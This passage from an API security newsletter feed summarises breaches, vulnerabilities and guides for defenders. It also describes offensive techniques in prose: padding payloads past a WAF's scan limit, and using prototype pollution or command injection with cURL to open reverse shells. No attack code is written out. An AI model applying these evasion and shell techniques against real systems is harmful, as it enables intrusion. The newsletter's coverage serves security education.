<li style="font-weight: 400;" aria-level="1"><b>Negative security model:</b><span style="font-weight: 400;"> this attempts to block so-called “known bad” via a “deny list”.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Positive security model:</b><span style="font-weight: 400;"> this only allows so-called “known good” via an “allow list”.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Hybrid security model:</b><span style="font-weight: 400;"> uses a combination of signatures (the deny list) and then checks if the request is allowed (the allow list). This improves efficiencies since block lists are easier to implement.</span></li>
</ul>
<p><span style="font-weight: 400;">Now, how do attackers exploit WAFs in practice? Firstly, attackers know that analyzing traffic is computationally expensive and increases latency. To this end, they will exploit the limitations of WAFs by sending large packets (such as 8kB or more), which will not be scanned </span><b>at all</b><span style="font-weight: 400;"> by many popular WAFs. Alternatively, attackers may pad their attack payloads by placing dummy data at the front of the payload and then placing the malicious payload at the end. The intent is to trick the WAF into allowing the packet once it has scanned a few kBs of innocuous data at the front of the payload.</span></p>
<p><span style="font-weight: 400;">Finally, the article concludes with three steps to improve your WAF security:</span></p>
<ul>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Test your web applications with padded request data.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Examine your web application logs to find request sizes greater than, say, 8kB to identify attacks.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Determine if you can change your configuration to disable padded attacks (limit the request size, for example).</span></li>
</ul>
<p><span style="font-weight: 400;">Web Application Firewalls are a useful tool in the armory of a defender, but it is worth being aware of some of their limitations and attack vectors.</span></p>
<h2><span style="font-weight: 400;">Guide: Using Postman Flows for API exploits</span></h2>
<p><span style="font-weight: 400;">Finally, this week, we finish with </span><a href="https://danaepp.com/writing-api-exploits-using-postman-flows" target="_blank" rel="noopener"><span style="font-weight: 400;">another of Dana Epp’s customarily awesome guides</span></a><span style="font-weight: 400;"> — this time, he shows us how to use the Workflows feature with Postman to exploit APIs. Dana describes the value of demonstrating an exploit in the real world rather than describing it at an abstract level. Certainly, from my experience, a developer is far more likely to implement a fix if they see their app being exploited with their own eyes. </span></p>
<p><span style="font-weight: 400;">Dana takes us through an introduction to Postman Flows (a GUI state-machine-like interface to automate API tasks), how to use it to implement some flows such as password reset and OTP enumeration, and how to use the Flow Query Language (FQL). He then uses it to crack the OWASP </span><i><span style="font-weight: 400;">crAPI</span></i><span style="font-weight: 400;"> password reset function. As usual, it’s an excellent read, taking you through all the details and the many lessons learned in this example. </span></p>
<p><span style="font-weight: 400;">I’ve used Flows previously to do some very basic automation, but this gives a view of the advanced attacks that can be implemented using Flows. I am inclined to agree that the limitation in being able to export or share Flows is an unfortunate one; hopefully, the good people at Postman are planning updates on this one in the future.</span></p>
<p><span style="font-weight: 400;">Thanks again, Dana, for a great guide. </span></p>
<p>The post <a href="https://apisecurity.io/issue-231-api-authentication-bypass-in-ivanti-sentry-docker-images-expose-api-and-keys/">Issue 231: API authentication bypass in Ivanti Sentry, Docker images expose API and keys</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 230: OpenSea API breach, flaw in Atlas VPN, using API fuzzing</title>
		<link>https://apisecurity.io/issue-230-opensea-api-breach-flaw-in-atlas-vpn-using-api-fuzzing/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 05 Oct 2023 16:16:14 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10971</guid>

					<description><![CDATA[<p>This week, we have news of a breach affecting users of the OpenSea NFR trading platform, requiring a key rotation; and disclosure of an API vulnerability in the Atlas VPN exposing user IP addresses. We also have an article from The New Stack on API fuzzing and its benefits and a guide on using Keycloak [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-230-opensea-api-breach-flaw-in-atlas-vpn-using-api-fuzzing/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-230-opensea-api-breach-flaw-in-atlas-vpn-using-api-fuzzing/">Issue 230: OpenSea API breach, flaw in Atlas VPN, using API fuzzing</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, <span style="font-weight: 400;">we have news of a breach affecting users of the OpenSea NFR trading platform, requiring a key rotation; and disclosure of an API vulnerability in the Atlas VPN exposing user IP addresses. We also have an article from The New Stack on API fuzzing and its benefits and a guide on using Keycloak for RBAC in microservices. Finally, Dana Epp makes it three issues in a row for a doubleheader of awesome guides, this time on prototype pollution and then AI testing in Postman.</span></p>
<h2><span style="font-weight: 400;">Breach: OpenSea API users warned of breach</span></h2>
<p>The popular NFT trading platform OpenSea <a href="https://decrypt.co/198496/opensea-api-users-warned-of-third-party-security-breach" target="_blank" rel="noopener">has warned certain platform users</a> to rotate their API keys. Although few details are provided in their official release, they suggest that one of their vendors may have experienced a security incident that led to the disclosure of OpenSea API keys. At the time of writing, there is no further detail of the number of users affected or whether other data besides these keys is impacted.</p>
<p>The article speculates whether this breach may be related to a breach at the third-party vendor of a popular blockchain analytics platform. OpenSea themselves were among several crypto companies to experience leakage of customer emails in an incident in June 2022. As is common with email leakages, attackers may use them to launch spear phishing campaigns against platform users (or even third-party vendors).</p>
<h2><span style="font-weight: 400;">Vulnerability: Flaw in Atlas VPN exposes user IPs</span></h2>
<p><a href="https://www.infosecurity-magazine.com/news/zero-day-flaw-exposes-atlas-vpn/" target="_blank" rel="noopener">Infosec Magazine reports on a vulnerability</a> affecting users of the Atlas VPN service that can potentially expose user’s IP addresses to an attacker or allow the attacker to control the VPN itself. The vulnerability was discovered by a user and confirmed by the vendor, who has advised users to avoid using the Linux VPN client until a patch is released. There is no report of this vulnerability having been exploited at all.</p>
<p>The vulnerability arises via an unauthenticated API in the Linux VPN client, which exposes a localhost API on port 8076. This API is meant to be used as an administrative interface, most likely from web clients in a browser. It is possible the designers were relying on the Cross-Origin Resource Sharing (CORS) protection of the browser. However, by executing a command instead of a request, the researcher demonstrated a proof-of-concept that bypassed this CORS protection. This proves the important security adage: always use a layered approach built on a defense-in-depth approach. Even a simple key or token could have prevented this attack vector.</p>
<h2><span style="font-weight: 400;">Article: API fuzzing and why you should use it</span></h2>
<p>One of the most effective approaches to API testing (including security) is to use an extensive fuzzing approach to detect deviations from intended behavior or failures with edge case data. <a href="https://thenewstack.io/api-fuzzing-what-is-it-and-why-should-you-use-it/" target="_blank" rel="noopener">Our next article from The New Stack</a> features this topic in-depth and covers how the Schemathesis tool can be used for API fuzzing.</p>
<p>Fuzzing is a long-established approach in software testing that involves providing synthetic and random data to a system under test. In the case of web applications, it is perhaps somewhat ineffective as a test method, but against APIs with well-defined contracts and behaviors, it can be invaluable in detecting deviations from expected behavior.</p>
<p>The article describes the following benefits of API fuzzing for API testing:</p>
<ul>
<li>Error handling and resilience: Rather than letting your users discover how well your API handles malformed or unexpected data input, use a fuzzing engine to exhaustively test with a large, varied payload. By identifying weaknesses in handling unexpected data, the API developer can greatly improve the resilience of their API.</li>
<li>Compliance and standards: Various regulations require a thorough testing regime and fuzzing is a good way to prove you meet these requirements.</li>
<li>Third-party integration: If you are integrating with a third-party API, then apply fuzz testing to that API to see how it behaves before integrating with it.</li>
<li>Cost-effectiveness: Fuzz testing can be fully automated at a massive scale and run within modern pipelines, eliminating the need for almost any human interaction.</li>
<li>Security assessment: Most important, though, is the value of API fuzzing as a means of security testing. Fuzzing can identify various input validation vulnerabilities, including buffer overflow and injection attacks. It can also detect where the API has responded incorrectly to deliberately malformed input, such as invalid data formats or schema.</li>
</ul>
<p>The article concludes with a showcase of the <a href="https://github.com/schemathesis/schemathesis" target="_blank" rel="noopener">Schemathesis</a> tool. This tool appears to offer a highly configurable and scalable approach to fuzzing both OpenAPI (REST) and GraphQL APIs. Some of the benefits include positive and negative tests, stateful testing, session replay, and various integrations with Python and CI/CD platforms. The tool can be run locally at the CLI or in Docker, or via a SaaS platform.</p>
<p>It’s always good to see new API security testing tools; this looks like a good one to add to the inventory.</p>
<h2><span style="font-weight: 400;">Guide: Using Keycloak for RBAC in microservices</span></h2>
<p><a href="https://www.cncf.io/blog/2023/05/17/securing-cloud-native-microservices-with-role-based-access-control-using-keycloak/" target="_blank" rel="noopener">Next up is an article of interest primarily for Java developers</a> wanting to integrate Single Sign-On into their applications. Keyclock joined the Cloud Native Computing Foundation in April 2023 as an incubator project and is a favorite as a cloud-native SSO server focusing on role-based access control (RBAC) across various complex landscapes from on-premises to full cloud-native cloud environments.</p>
<p>The article describes using the Keycloak server to implement an OpenID Connect authorization code flow using the Quarkus Java framework, which has its own OIDC connector. The tutorial shows the mechanics of setting up an application and getting it working with Keycloak for OIDC, and then gets on to the interesting topic of how to add RBAC security to REST APIs.</p>
<p>Keycloak seems to be an increasingly popular choice for SSO solutions, and this article shows how easily it can be integrated into an API.</p>
<h2><span style="font-weight: 400;">Article: Exploiting APIs with prototype pollution</span></h2>
<p>Next up is a<a href="https://danaepp.com/how-to-exploit-an-api-using-prototype-pollution" target="_blank" rel="noopener"> real mind-bender of an article</a> from Dana Epp on the topic of prototype pollution on Node.js, and how this can be exploited to create remote code execution (RCE) attacks. I’d recommend that the reader invest the time to work through the article as it’s definitely worth the effort; it took me a few reads before I understood what was possible.</p>
<p><a href="https://portswigger.net/web-security/prototype-pollution" target="_blank" rel="noopener">Prototype pollution</a> is a particular issue affecting JavaScript and results when a user can modify the prototype (a construct that allows JavaScript to manage inheritance) of an object. Essentially, if an attacker can modify the prototype of an object, they can change the underlying data object to something of their choosing. It’s not exactly like this, but it’s a fair approximation.</p>
<p>Dana describes how to test Node.js servers running the Express framework for susceptibility to a server-side prototype pollution attack (if you want to learn more, then <a href="https://portswigger.net/web-security/prototype-pollution/server-side?ref=danaepp.com" target="_blank" rel="noopener">Port Swigger have you covered</a>). He then describes how to inject a dangerous payload (a script to open a reverse shell) and then inject that into an object’s prototype to get a reverse shell.</p>
<p>I’ve not had the time to try this myself, but I am quite fascinated by the mechanics of a prototype pollution attack (and why such a mechanism would exist at all ?) and will work through this and the PortSwigger labs in due course.</p>
<p>I will follow Dana’s advice though: “DO NOT RUN THIS ON A MACHINE CONNECTED TO THE INTERNET. YOU’VE BEEN WARNED.”</p>
<h2><span style="font-weight: 400;">Guide: Using AI for API testing in Postman</span></h2>
<p>The final article this week comes from Dana Epp again and covers the recent testing he did with the new Postbot features within Postman. Tl;dr: he found it to be a really useful tool in writing API test code in Postman. My own tests concluded that it’s likely to be quicker than I am.</p>
<p>API developers are used to using Postman to perform basic acceptance testing of their APIs while they&#8217;re coding them, but many are unaware of the powerful test automation features incorporated in Postman via the integrated scripting engine. Using this feature, creating custom scripts and checking the API responses for custom conditions and response codes is easy.</p>
<p>Recently, Postman got the AI buzz and added the ability to generate test scripts courtesy of an AI prompt familiar with the scripting framework. Simply describe your test requirement to the prompt (&#8220;check if the response contains a field called &#8216;CVV'&#8221;), and it does a pretty good job of writing the test code, certainly quicker than it would take me to read the manual.</p>
<p>Dana takes it to the next level with some of the scenarios he gave to Postman, such as:</p>
<p><code>“write a test that loops through an array of common command injection payloads and inserts them into the "query" parameter of this request. For each item in the array send one request URL encoded, and one that is not.”</code></p>
<p>Postbot really did a surprisingly good job of writing a test for this &#8211; as Dana concludes: “I’ll be damned. Postbot is a thing.”</p>
<h2><span style="font-weight: 400;">API World Event, Santa Clara &#8211; Complimentary Tickets</span></h2>
<p>Join 42Crunch this month at API World, Santa Clara, Oct 24-26 where 42Crunch will be revealing some new platform capabilities and running several workshops. Booth#115-117.</p>
<p>We have a limited number of free passes, so if you would like to attend please follow this link to <a href="https://www.devnetwork.com/invited-registration/?event=API+World+2023&amp;c=42Crunch&amp;img1=https%3A%2F%2Fapiworld.co%2Fwp-content%2Fuploads%2F2021%2F09%2F42crunch.png&amp;utm_source=hs_email&amp;utm_medium=email&amp;utm_campaign=APISecurity+newsletter&amp;discount=42Crunch&amp;type=sponsor&amp;_hsenc=p2ANqtz-8jwzxqktrCPEimterkrKkdkW4NoYHZatKgypYjxkAd_NA1gPfe4P5xtGUT8Dm3VsVR-LA4" target="_blank" rel="noopener">register for your free OPEN Pass</a>.</p>
<p>Isabelle Mauny, Field CTO &amp; Co-Founder at 42Crunch will be talking on the following topics:</p>
<ul>
<li>API Workshop: Common API Security Pitfalls</li>
<li>Why so many API Security Solutions have failed to Deliver</li>
<li>How to Protect your APIs from the new OWASP API Top 10 Security Risks</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-230-opensea-api-breach-flaw-in-atlas-vpn-using-api-fuzzing/">Issue 230: OpenSea API breach, flaw in Atlas VPN, using API fuzzing</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 229: Incidents with DuoLingo and JumpCloud, FastAPI for APIs, and five best practices</title>
		<link>https://apisecurity.io/issue-229-incidents-with-duolingo-and-jumpcloud-fastapi-for-apis-and-five-best-practices/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 21 Sep 2023 16:09:11 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10966</guid>

					<description><![CDATA[<p>This week, we have news of two API security incidents: the reported leakage of the data of 2.6 million DuoLingo users and an incident at JumpCloud that resulted in resetting customer API keys. For the technically minded, we have two guides: the first discusses how to use API keys in an ASP.Net Core application, and [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-229-incidents-with-duolingo-and-jumpcloud-fastapi-for-apis-and-five-best-practices/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-229-incidents-with-duolingo-and-jumpcloud-fastapi-for-apis-and-five-best-practices/">Issue 229: Incidents with DuoLingo and JumpCloud, FastAPI for APIs, and five best practices</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have news of two API security incidents: the reported leakage of the data of 2.6 million DuoLingo users and an incident at JumpCloud that resulted in resetting customer API keys. For the technically minded, we have two guides: the first discusses how to use API keys in an ASP.Net Core application, and the second covers the excellent FastAPI Python framework. We have an article on five best practices for API security, and once again, we conclude with two articles from Dana Epp.</p>
<h2><span style="font-weight: 400;">Incident: Data of 2.6 million DuoLingo platform users leaked</span></h2>
<p>First up this week, <a href="https://www.infosecurity-magazine.com/news/data-26m-duolingo-users-leaked/" target="_blank" rel="noopener">we have coverage of the ongoing data leakage</a> affecting users of the DuoLingo language learning platform. According to the report in the Infosecurity Magazine, the personal data of as many as 2.6 million users has been leaked on a hacking forum. The information included real names, login identifiers, email addresses, and many internal metadata items, including courses taken, progress, rankings, etc.</p>
<p>The leakage was highlighted to DuoLingo, who responded by saying that the information was available via public profiles and did not represent a compromise of their systems. The fact that email address information was leaked is concerning since this indicates the validity of the email, which can allow targeted phishing attempts. Since an attacker could link an email to a user’s DuoLingo account, they greatly increase the chances of a successful attack since the victim will be more inclined to believe an email for a service they subscribe to. The data surfaced on the Breached hacking forum and was available for the grand sum of $2.13.</p>
<p>The root cause of the leakage was a totally unauthenticated public API taking an email address as a query parameter. By querying this API with email lists, the attacker could quickly build up a database of users. Suffice it to say the API endpoint also did not provide any form of rate limiting to thwart efforts such as mass exfiltration.</p>
<p>At the time of writing DuoLingo has made no effort to remove or restrict the API. The API was still very public and revealing personal data on DuoLingo. DuoLingo says that account closure requests will be actioned within ten working days. Stay tuned for an update. If you have an account and want to check your own email, here is where you <a href="https://twitter.com/IvanoSomaini/status/1631168225399525376?s=20" target="_blank" rel="noopener">find further details</a>.</p>
<h2><span style="font-weight: 400;">Incident: JumpCloud resets customer API keys</span></h2>
<p>The other incident covered this week is the <a href="https://techcrunch.com/2023/07/10/jumpcloud-api-keys-ongoing-incident/" target="_blank" rel="noopener">apparent incident affecting JumpCloud</a>, a cloud services provider. Although few details of the incident are known, the upshot was that JumpCloud reset all of its customers’ API keys “out of an abundance of caution”, as they described it in their official communications.</p>
<p>Whilst we can only speculate as to the nature of the incident, it is likely to have been quite serious in nature for this step to have been taken by JumpBox. Whilst they mitigate the immediate risk of access by an unauthorized 3rd party using a leaked key, they create another not-insignificant problem, and that is the redeployment of the new keys to downstream systems. Unless their customers had planned for this activity specifically in their recovery plans, this could be a significant undertaking.</p>
<p>This highlights the importance of API keys in today’s API-based systems: firstly, they must be protected from leakage, and secondly, organizations are well advised to have a key rotation plan.</p>
<h2><span style="font-weight: 400;">Guide: Using API keys in ASP.Net Core applications</span></h2>
<p>The next guide will hold appeal for any ASP.Net Core developers and focuses on <a href="https://www.infoworld.com/article/3701888/how-to-use-api-keys-to-secure-web-apis-in-aspnet-core.html" target="_blank" rel="noopener">how to use API keys within their .Net Core application</a>. This brief guide focuses on the two most common methods of validating API keys: using the built-in key validation middleware or using custom attribute decorators.</p>
<p>To use the middleware approach, the developer implements a single key validation method that checks the key against all known values and returns a pass/fail. All that needs to be done to use this method is to make a single method call in the application setup to inject this handler into the request flow; the rest will be handled transparently by the .Net core engine.</p>
<p>To use the custom attribute method, the developer implements a single key validation method that checks the key against all known values and returns a pass/fail. It is important to ensure that this method derives from the Attribute class, allowing it to be used as a decorator for endpoint methods. To add this to a handler, all that needs to be done is to add the appropriate decorator to the endpoint method, which will cause it to be invoked on every endpoint call.</p>
<p>Why would you use one over the other? It’s a trade-off: using the middleware ensures that the authentication check cannot be omitted accidentally, while the custom attribute method allows a more granular level of control. It’s up to the designer which suits their needs better.</p>
<h2><span style="font-weight: 400;">Guide: Using FastAPI to build secure and performant APIs</span></h2>
<p>The next developer-focused article is for our readers writing Python implementations and showcases many of the fantastic <a href="https://dzone.com/articles/leveraging-fastapi-for-building-secure-and-high-pe" target="_blank" rel="noopener">features of the FastAPI framework</a>. Personally, I have been using this framework for the last few months, writing samples for my API security book, and I can attest to the power of this modern, performant framework.</p>
<p>This DZone article focuses on some of the key benefits, including:</p>
<ul>
<li><strong>Unmatched Performance</strong>: FastAPI (the clue is in the name) is fast due to the Starlette high-performance asynchronous framework at its core. It’s worth noting that it is fast relative to other Python frameworks; if you want to get a better idea of how it ranks against others, <a href="https://gochronicles.com/benchmark-restful-apis/" target="_blank" rel="noopener">here is a great comparison</a>.</li>
<li><strong>Type Safety and Documentation</strong>: As much of a fan of Python’s run-time typing as I am, it undoubtedly leads to fragility at runtime. FastAPI uses the Pydantic typing system to clearly define and enforce the data types for requests and responses. This aligns perfectly with the drive toward adopting the OpenAPI specification in defining API data types.</li>
<li><strong>Security and Authentication</strong>: My favorite aspect of FastAPI is the excellent built-in support for many security features, particularly the wide support for authentication and authorization mechanisms.</li>
<li><strong>Scalability and Extensibility</strong>: FastAPIs asynchronous design allows for very effective horizontal scaling, and its modular design allows for easy integration with other libraries and frameworks.</li>
<li><strong>Automated Testing and Debugging</strong>: FastAPI has excellent support for native Python test frameworks such as pytest and pytest-bdd, making it easy to write tests for your APIs as you implement them.</li>
</ul>
<p>If you are starting out learning about APIs and/or Python, I can heartily recommend the FastAPI framework. Thanks to DZone for a great article.</p>
<h2><span style="font-weight: 400;">Article: Five best-practices for API security</span></h2>
<p>There is no shortage of guides on best practices for API security, and they are always a favorite with our readers. This week, we feature a really <a href="https://www.rtinsights.com/close-your-api-security-gaps-prevent-breaches-with-these-five-best-practices/" target="_blank" rel="noopener">good one from RTInsights</a> with some interesting takes on some common themes. The author highlights the rise in API security incidents, citing the following as concerns for API security:</p>
<ul>
<li>Mismanagement of API tokens and keys (see the second article in this newsletter)</li>
<li>The increase in DDoS attacks globally</li>
<li>Easily accessible credentials such as usernames and passwords</li>
<li>Machine-in-the-middle (MitM) attacks</li>
</ul>
<p>The author recommends the following five best practices for improving API security:</p>
<ol>
<li>Assess your organization’s infrastructure and processes: As often stated, you cannot secure what you do not know. The first step is to build a full view of the inventory of your organization’s APIs, including internal and external APIs and, of course, third-party APIs.</li>
<li>Pay attention to data security in the cloud: Beware of the increased attack surfaces resulting from cloud service adoption. Even if your API itself is secure, it may be vulnerable if built on top of poorly configured cloud infrastructure.</li>
<li>Make multi-factor authentication a requirement: Usernames and passwords are no longer sufficient for secure access in 2023; ensure that you use some form of MFA and resilient authorization framework such as OAuth.</li>
<li>Ensure the right users have access to the right data — and no more: Readers of this newsletter will be familiar with the high number of instances of excessive information exposure seen in breaches. Often, it&#8217;s clear that the API designers have failed to understand the privacy requirements related to data that is obviously PII and should have restricted access.</li>
<li>Secure certificate keys in a keystore: Moving to mutually authenticated certificates adds another layer of security, but do ensure these certificates are stored securely in an appropriate keystore.</li>
</ol>
<p>Thanks to the author for an interesting take on some familiar themes.</p>
<h2><span style="font-weight: 400;">Guide: Creating reverse shells with cURL</span></h2>
<p>You just cannot keep Dana Epp out of this newsletter, and in the <a href="https://danaepp.com/mastering-api-exploitation-crafting-reverse-shells-via-curl" target="_blank" rel="noopener">first of two guides this week</a>, he discusses how to create a reverse shell using the cURL utility. For those not familiar with the dark side, a reverse shell is one of the most prized discoveries for a hacker — effectively, this is opening a back door on a system that a hacker can then use to further exploit the system. Think of it like leaving a shell session open on your computer, allowing anyone with access to that shell session to do anything they wish to your computer.</p>
<p>Dana describes exploiting a <a href="https://apisecurity.io/issue-181-vulnerability-wavlink-router-api-exposing-system-passwords-views-internal-apis/" target="_blank" rel="noopener">command injection vulnerability</a> (these are all too frequently encountered on APIs) to then use cURL to create a reverse shell. For this article, he takes us on a detailed journey using a vulnerable test app he created.</p>
<p>Why use cURL over tools like netcat and socat? The latter are often identified as dangerous tools and removed from restricted environments (in my past life, it was a severe policy violation to even have these tools on your machine). cURL, however, is just a boring HTTP client, right? It is until Dana gets hold of it !</p>
<p>Another great article, and I’d recommend a deeper read to see how easy this exploit really is. Also, a great shout-out to <a href="https://ngrok.com/" target="_blank" rel="noopener">ngrok</a>, a must-have tool for any API tinkerer.</p>
<h2><span style="font-weight: 400;">Guide: Using Burp’s Bchecks for API security testing</span></h2>
<p>Dana’s <a href="https://danaepp.com/improve-your-api-security-testing-with-burp-bcheck-scripts" target="_blank" rel="noopener">second article this week</a> is a topic close to my heart: using the awesome new Bchecks capability within BurpSuite to assist with API security testing. For those unfamiliar with BurpSuite, this is the preeminent web application hacking tool produced by PortSwigger in the U.K. Part of its immense popularity is its extensibility facilitated by its plugin architecture — there is a marketplace plugin for almost anything you could wish to accomplish. However, there is a barrier to entry to create plugins, and that is some development knowledge using Java.</p>
<p>Fortunately, PortSwigger recently added a scripting engine into BurpSuite to allow users to write so-called Bchecks scripts that execute within BurpSuite, and can output their findings into the reports and output logs. The scripting language is simple to understand and quite powerful, hopefully enabling almost anyone to write custom tests.</p>
<p>I would simply refer readers to Dana’s article, where he shows how to test for the following:</p>
<ul>
<li>Detecting API calls with a missing authorization header.</li>
<li>Checking to see if a security.txt file was published on the server.</li>
</ul>
<p>I would love to hear more from readers on where they think Bscripts could be used to enhance API security testing from a defensive perspective. If anyone knows of repositories of great API-centric scripts, please do reach out so I can share them. Or please create your own and let me know.</p>
<p>The post <a href="https://apisecurity.io/issue-229-incidents-with-duolingo-and-jumpcloud-fastapi-for-apis-and-five-best-practices/">Issue 229: Incidents with DuoLingo and JumpCloud, FastAPI for APIs, and five best practices</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 228: 3rd party API security, OAuth2 step-up deep-dive, shadow and zombie APIs</title>
		<link>https://apisecurity.io/issue-228-3rd-party-api-security-oauth2-step-up-deep-dive-shadow-and-zombie-apis/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 07 Sep 2023 22:08:02 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10954</guid>

					<description><![CDATA[<p>This week, we have a timely article on the five best practices for ensuring the security of 3rd party APIs, a deep-dive guide into the OAuth2 step-up authentication protocol, and two separate articles on the danger of hidden APIs, namely shadow and zombie APIs. We conclude with not one but two excellent guides from Dana [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-228-3rd-party-api-security-oauth2-step-up-deep-dive-shadow-and-zombie-apis/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-228-3rd-party-api-security-oauth2-step-up-deep-dive-shadow-and-zombie-apis/">Issue 228: 3rd party API security, OAuth2 step-up deep-dive, shadow and zombie APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><span style="font-weight: 400;">This week, we have a timely article on the five best practices for ensuring the security of 3rd party APIs, a deep-dive guide into the OAuth2 step-up authentication protocol, and two separate articles on the danger of hidden APIs, namely shadow and zombie APIs. We conclude with not one but two excellent guides from Dana Epp on SSRF and the Gron tool.</span></p>
<h2><span style="font-weight: 400;">Article: Five best practices for 3rd party API security</span></h2>
<p><span style="font-weight: 400;">One of the new entries into the OWASP API Security Top 10 in 2023 is </span><a href="https://owasp.org/API-Security/editions/2023/en/0xaa-unsafe-consumption-of-apis/" target="_blank" rel="noopener"><span style="font-weight: 400;">API10:2023 Unsafe Consumption of APIs</span></a><span style="font-weight: 400;">, which addresses the risks associated with consuming 3rd party APIs. This topic receives surprisingly little coverage, and it was good to see this </span><a href="https://www.csoonline.com/article/575561/5-best-practices-to-ensure-the-security-of-third-party-apis.html" target="_blank" rel="noopener"><span style="font-weight: 400;">excellent article in  CSO Online</span></a><span style="font-weight: 400;"> covering five best practices to ensure the security of 3rd party APIs. </span></p>
<p><span style="font-weight: 400;">Just like developers are sometimes inclined to blindly trust user input (to their peril), so many organizations are inclined to trust their upstream 3rd party API providers. Unfortunately, these APIs may have vulnerabilities (such as data leakage or injection vulnerabilities) that can adversely impact the consumer application. The old adage of a chain only being as strong as the weakest link applies well to a system composed of APIs — if your system is consuming a vulnerable API, then your own system is exposed to this same vulnerability. </span></p>
<p><span style="font-weight: 400;">The article gives some strong and actionable recommendations for protecting the security of your third-party APIs. The first recommendation is one of visibility and recommends maintaining an API inventory that </span><b>includes</b><span style="font-weight: 400;"> your 3rd party APIs. This inventory should be kept up to date and track changes to APIs as they occur to identify shadow APIs. </span></p>
<p><span style="font-weight: 400;">The next recommendation is to address your API vendors directly. Before onboarding a new 3rd party API, ensure you conduct due diligence on the provider, including understanding their development process and what controls they implement to secure their APIs. This may include touch points such as their change management process and an active vulnerability management process. Do not assume that their API is secure regardless, and introduce active monitoring and alerting on the API to identify any vulnerabilities. </span></p>
<p><span style="font-weight: 400;">If you really want to ensure the security of a 3rd party API, then you should consider actively testing it yourself for vulnerabilities. If you find any, then insist on remediation by the vendor before continuing to use the API.</span></p>
<p><span style="font-weight: 400;">Finally, since 3rd party APIs may frequently be the target of interception or impersonation, it is advisable to rotate API keys to prevent the likelihood of machine-in-the-middle attacks. </span></p>
<h2><span style="font-weight: 400;">Article: OAuth2 step-up protocol deep-dive</span></h2>
<p><span style="font-weight: 400;">The</span><a href="https://www.authlete.com/developers/stepup_authn/" target="_blank" rel="noopener"><span style="font-weight: 400;"> next article is a deep dive</span></a><span style="font-weight: 400;"> into the OAuth2 step-up protocol from Authlete, which will be useful for anyone wanting to bolster their API security. One of the leading causes of API compromise is broken authentication; in fact, OWASP rates this as the second most significant API security risk. </span></p>
<p><span style="font-weight: 400;">One of the most robust ways of improving the authentication process is to put an additional layer around sensitive operations and issue a so-called step-up challenge to the client to provide an additional level of authentication, usually in the form of a multi-factor authentication token or hardware key. This is shown in a sequence diagram below:</span></p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-10955" src="https://apisecurity.io/wp-content/uploads/2023/09/Article2-300x169.jpg" alt="" width="600" height="338" srcset="https://apisecurity.io/wp-content/uploads/2023/09/Article2-300x169.jpg 300w, https://apisecurity.io/wp-content/uploads/2023/09/Article2-1024x576.jpg 1024w, https://apisecurity.io/wp-content/uploads/2023/09/Article2-768x432.jpg 768w, https://apisecurity.io/wp-content/uploads/2023/09/Article2-1536x864.jpg 1536w, https://apisecurity.io/wp-content/uploads/2023/09/Article2.jpg 1920w" sizes="auto, (max-width: 600px) 100vw, 600px" /></p>
<p><br style="font-weight: 400;" /><span style="font-weight: 400;">The server will respond to an authentication attempt with an Authentication Context Class Reference (ACR), which specifies the types of authentication that can be used to proceed. </span></p>
<p><span style="font-weight: 400;">The topic is a complex one, and API developers should make sure they are considering using step-up authentication to protect their most sensitive endpoints. This article focuses on the details of the specification; for a more practical discussion, </span><a href="https://www.scottbrady91.com/oauth/step-up-authentication" target="_blank" rel="noopener"><span style="font-weight: 400;">this article from Scott Brady</span></a><span style="font-weight: 400;"> is worth reading.</span></p>
<h2><span style="font-weight: 400;">Article: Preventing zombie APIs</span></h2>
<p><span style="font-weight: 400;">Next, we have the first two articles focusing on the challenges of API inventory. In an</span><a href="https://devops.com/how-to-prevent-zombie-apis/" target="_blank" rel="noopener"><span style="font-weight: 400;"> article for DevOps.com</span></a><span style="font-weight: 400;">, the redoubtable Bill Doerfield discusses the security risks of zombie APIs and how to address them. Zombie APIs are usually considered APIs that are no longer in active use and, most importantly, no longer being maintained or monitored for security events. Zombie APIs typically occur when an organization releases a new version of an API but leaves the old version in place while the cutover to the new API takes place. Unfortunately, in many cases, the old API is left running and discoverable by attackers.</span></p>
<p><span style="font-weight: 400;">In the article, Bill gives the following tips on how to minimize the occurrence of zombie APIs, namely:</span></p>
<ul>
